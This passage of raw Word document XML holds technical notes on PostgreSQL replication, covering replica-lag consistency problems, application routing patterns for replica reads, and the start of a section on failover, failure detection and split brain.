        <w:t xml:space="preserve">  Each transaction gets its own apply worker while streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E7B0F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  At COMMIT: workers synchronize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D1846" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E190AC7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Limitation: transactions must be streamed before commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF237F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Small transactions complete before streaming threshold → serial apply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC1A99C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    logical_decoding_work_mem threshold for streaming: 64MB default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C94A3DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5EEEC3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Most effective for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA7F64" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Large transactions (exceed streaming threshold)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF5DCEA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Workloads with many concurrent long-running transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C29090C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reading from Replicas — Application-Level Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4CFDEF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The replication lag visibility problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB674DD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE4795" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Scenario: user creates an account, is immediately redirected to their profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FCFE5D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4FB70A74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Timeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18E7B9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  t=0ms: INSERT INTO users (alice) on Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E670C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  t=0ms: Primary returns success, user redirected to /profile/alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643EBBB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  t=5ms: GET /profile/alice → load balancer sends to Replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B763DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  t=5ms: Replica SELECT * FROM users WHERE name='alice' → NOT FOUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547EE396" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  t=10ms: WAL arrives at Replica, Alice's row applied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDC437" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D39D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>User sees: "User not found" immediately after creating their account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0A800" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>This is the read-your-writes consistency violation from replica reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569D900" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application patterns for handling replication lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B69609" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA6CA96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Pattern 1: Read-your-writes via sticky routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6A4DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  After write: route subsequent reads for that session to the primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFEAB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Session cookie or header: "this session's last write LSN = 0/F234A890"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B1629" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Middleware: if current request has write cookie → route to primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE13E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              if request LSN &gt; replica's current LSN → route to primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DDC202" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">              else → route to replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216898B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B6D9ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  PostgreSQL: pg_last_wal_replay_lsn() on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D33D34" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If session_lsn &gt; pg_last_wal_replay_lsn(): route to primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFC125" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A016655" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Expiry: after N seconds (or after replica catches up), route to replica again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BFA611" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="6D52B62F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Pattern 2: Wait-for-replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19242B61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  After write, wait for specific replica to catch up before serving read:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA0D6EC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461D56F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3845B18E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    after_write_lsn = get_primary_lsn()  # SELECT pg_current_wal_lsn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B97132" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    target_replica.wait_for_lsn(after_write_lsn, timeout=5s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3938787C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    # SELECT pg_wal_replay_wait('0/F234A890', 5000)  -- PostgreSQL 16+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46730769" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    then: read from target_replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0233B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28847157" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Cost: additional roundtrip to get primary LSN + wait on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFCE773" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Benefit: read-after-write consistency without routing all reads to primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3048269B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5AFDDDA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Pattern 3: Bounded staleness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582D253C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Accept stale reads but bound staleness to an acceptable window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FA5945" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F8A2D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read from replica only if replica_lag &lt; max_acceptable_lag (e.g., 5 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4BF94" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If replica_lag &gt; threshold: route to primary (or return error)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70568BCC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433DF4B0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Monitor: SELECT now() - pg_last_xact_replay_timestamp() AS lag FROM replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE0ED36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="61F91252" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Pattern 4: Explicit consistency requirements per query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40CE99" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Tag queries with consistency requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70429241" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F1BD2D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  class DatabaseRouter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3410A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    def db_for_read(self, model, **hints):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712E05D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      if hints.get('strong_consistency'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3657C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        return 'primary'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D26136" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      if hints.get('max_lag_seconds', inf) &lt; self.replica_lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE80804" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">        return 'primary'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26887286" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      return 'replica'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E4CD4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F64C29" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  # Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4B75C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  User.objects.using(strong_consistency=True).get(id=user_id)  # always primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048AFE92" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Product.objects.using(max_lag_seconds=60).all()  # tolerate 60s lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354D8B7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="1BDC79A7">
          <v:rect id="_x0000_i5515" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="490ACEBB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Failover and High Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA9A524" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure Detection — The First Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D311B51" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Before a replica can be promoted, the primary's failure must be detected. This is harder than it appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF19F9C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The false positive problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6384EB74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D499B6D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Network partition: primary is alive but unreachable from monitoring host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCA015" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Monitoring detects "failure"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6064B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Replica promoted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5C3BB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Primary recovers: now two primaries accepting writes = SPLIT BRAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BDED5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5054D1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>This is the most dangerous failure mode in replication — worse than no failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D29BB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Two primaries → divergent writes → data corruption that may be undetectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB6689" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure detection mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C896711" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E43D417" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Simple heartbeat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C32D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Monitor sends heartbeat to primary every N seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A69288" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If no response in M consecutive checks → declare failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36504924" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112CCD5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Problem: network blip → false positive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0948F0A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Tuning: smaller N = faster detection, more false positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E451860" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           larger M = fewer false positives, slower detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4EF52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1DEB76" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  PostgreSQL: wal_sender_timeout (primary declares replica dead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF036E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              wal_receiver_timeout (replica declares primary dead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09936C94" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="77B92688" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Consensus-based detection (Patroni, Pacemaker):</w:t>
      </w:r>
    </w:p>
